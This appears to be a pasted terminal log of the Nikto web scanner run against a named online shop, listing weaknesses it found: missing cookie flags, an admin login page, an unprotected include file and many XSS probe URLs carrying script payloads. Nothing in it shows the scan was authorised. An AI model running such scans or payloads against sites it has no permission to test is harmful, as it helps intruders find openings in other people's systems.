Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hacker@Antares MINGW64 ~/nikto-2.1.5
- $ ./nikto.pl -update
- + Retrieving 'nikto_report_csv.plugin'
- + Retrieving 'nikto_cookies.plugin'
- + Retrieving 'db_tests'
- + Retrieving 'nikto_headers.plugin'
- + Retrieving 'db_parked_strings'
- + Retrieving 'CHANGES.txt'
- + CIRT.net message: Please submit Nikto bugs to https://github.com/sullo/nikto
- Hacker@Antares MINGW64 ~/nikto-2.1.5
- $ ./nikto.pl -host rexant-shop.ru
- - Nikto v2.1.5
- ---------------------------------------------------------------------------
- + Target IP: 90.156.201.84
- + Target Hostname: rexant-shop.ru
- + Target Port: 80
- + Start Time: 2016-10-17 18:29:34 (GMT3)
- ---------------------------------------------------------------------------
- + Server: Apache
- + Cookie PHPSESSID created without the httponly flag
- + The anti-clickjacking X-Frame-Options header is not present.
- + Server banner has changed from 'Apache' to 'nginx' which may suggest a WAF, load balancer or proxy is in place
- + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for detail s.
- + OSVDB-59619: /inc/config.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the ' prefix' variable.
- + /index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http ://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2820: /index.php?dir=<script>alert('Vulnerable')</script>: Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
- + OSVDB-50552: /index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>: Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). http://www.cert.o rg/advisories/CA-2000-02.html.
- + /index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
- + /index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-20 00-02.html.
- + OSVDB-50553: /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XS S). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-50553: /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&Se archContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/adviso ries/CA-2000-02.html.
- + OSVDB-38019: /?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/C A-2000-02.html.
- + OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
- + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
- + OSVDB-25497: /index.php?rep=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS.
- + OSVDB-12606: /index.php?err=3&email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
- + OSVDB-2790: /index.php?vo=\"><script>alert(document.cookie);</script>: Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-3092: /news: This might be interesting...
- + Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
- + OSVDB-3233: /icons/README: Apache default file found.
- + /admin/login.php: Admin login page/section found.
- + Cookie 226776f356d7ecf58b60bab12a05d38f created without the httponly flag
- + Cookie 21e558d425bf38e4a2473c40a5b0b2b9 created without the httponly flag
- + 6545 items checked: 0 error(s) and 23 item(s) reported on remote host
- + End Time: 2016-10-17 18:35:16 (GMT3) (342 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement